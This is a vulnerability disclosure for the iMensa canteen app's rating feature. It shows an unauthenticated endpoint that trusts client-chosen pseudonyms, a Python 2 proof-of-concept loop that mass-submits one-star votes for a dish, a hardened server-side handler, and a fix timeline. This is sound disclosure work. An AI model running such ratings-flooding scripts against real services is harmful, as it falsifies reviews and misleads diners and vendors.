iMensa food ratings manipulable

Report ID



  • Vendor: Intelligent Systems GmbH
  • Product: iMensa
  • Affected Version: Any versions
  • Severity: Ratings can be manipulated at will. This may influence how many people visit a canteen.
  • Short summary: A dish can be rated any number of times with a simple, unauthenticated HTTP request.


All dishes for a canteen can be found here:
example for HDA Schoefferstrasse (refectory ID dar3):

Dishes are rated with a single HTTP request containing the number of stars, the dish (meal) ID and a user identifier ("pseudonym"). The pseudonym is chosen by the client and can be generated at random, so the server cannot tell one voter from another.

An example Python 2 script that rates a dish with 1 star many times (the target URL is left blank in this advisory):

import urllib2

for i in range(3100, 9999):
    # every request carries a different, made-up pseudonym, so each one counts as a new voter
    data = '{"refectory":"dar3","day":"2017-06-02","meal":"1198990","stars":1,"pseudonym":"593087636c' + str(i) + '.36194932"}'
    print urllib2.urlopen("", data).read()


None available.

Suggested Mitigation

If you don’t wish to receive fake ratings, tie each rating to an authenticated account on the server side instead of trusting a client-chosen pseudonym, and store at most one rating per account, dish and day. CAPTCHAs might also be an option for preventing mass fake ratings.
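A server-side handler implementing that mitigation, as an added example that is not part of this advisory or of iMensa's code; the session table, the in-memory store and the validation rules are assumptions, only the JSON field names are taken from the request shown above.

```python
import json
from dataclasses import dataclass, field

# Constructed stand-in for a server-side session store: session token -> account ID.
# The real backend's data model is not known; this is an assumption for the example.
SESSIONS = {"tok-alice": "user-1", "tok-bob": "user-2"}


@dataclass
class RatingStore:
    # (refectory, day, meal, account) -> stars: at most one vote per account, dish and day
    votes: dict = field(default_factory=dict)

    def average(self, refectory, day, meal):
        stars = [s for (r, d, m, _acct), s in self.votes.items()
                 if (r, d, m) == (refectory, day, meal)]
        return sum(stars) / len(stars) if stars else None


def submit_rating(session_token, body, store):
    """Hardened rating endpoint: identity comes from the session, never from the body."""
    account = SESSIONS.get(session_token)
    if account is None:
        return 401, "authentication required"
    try:
        req = json.loads(body)
    except ValueError:
        return 400, "malformed JSON"
    for key in ("refectory", "day", "meal", "stars"):
        if key not in req:
            return 400, "missing field: " + key
    stars = req["stars"]
    if isinstance(stars, bool) or not isinstance(stars, int) or not 1 <= stars <= 5:
        return 400, "stars must be an integer between 1 and 5"
    # A client-supplied "pseudonym" is deliberately ignored. Keying the vote on the
    # authenticated account means re-sending the request only overwrites that account's
    # own vote; it can never add a second one.
    store.votes[(req["refectory"], req["day"], str(req["meal"]), account)] = stars
    return 200, "ok"


if __name__ == "__main__":
    store = RatingStore()
    for i in range(3100, 3110):  # replay the advisory's loop under a single session
        body = ('{"refectory":"dar3","day":"2017-06-02","meal":"1198990","stars":1,'
                '"pseudonym":"593087636c' + str(i) + '.36194932"}')
        submit_rating("tok-alice", body, store)
    print(len(store.votes), "vote(s) recorded")  # 1, not 10
```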


Timeline

  • 2017-08-09: Vulnerability found
  • 2017-08-09: Contacted developer
  • 2017-08-10: Sent advisory to developer
  • 2017-08-18: Vulnerability fixed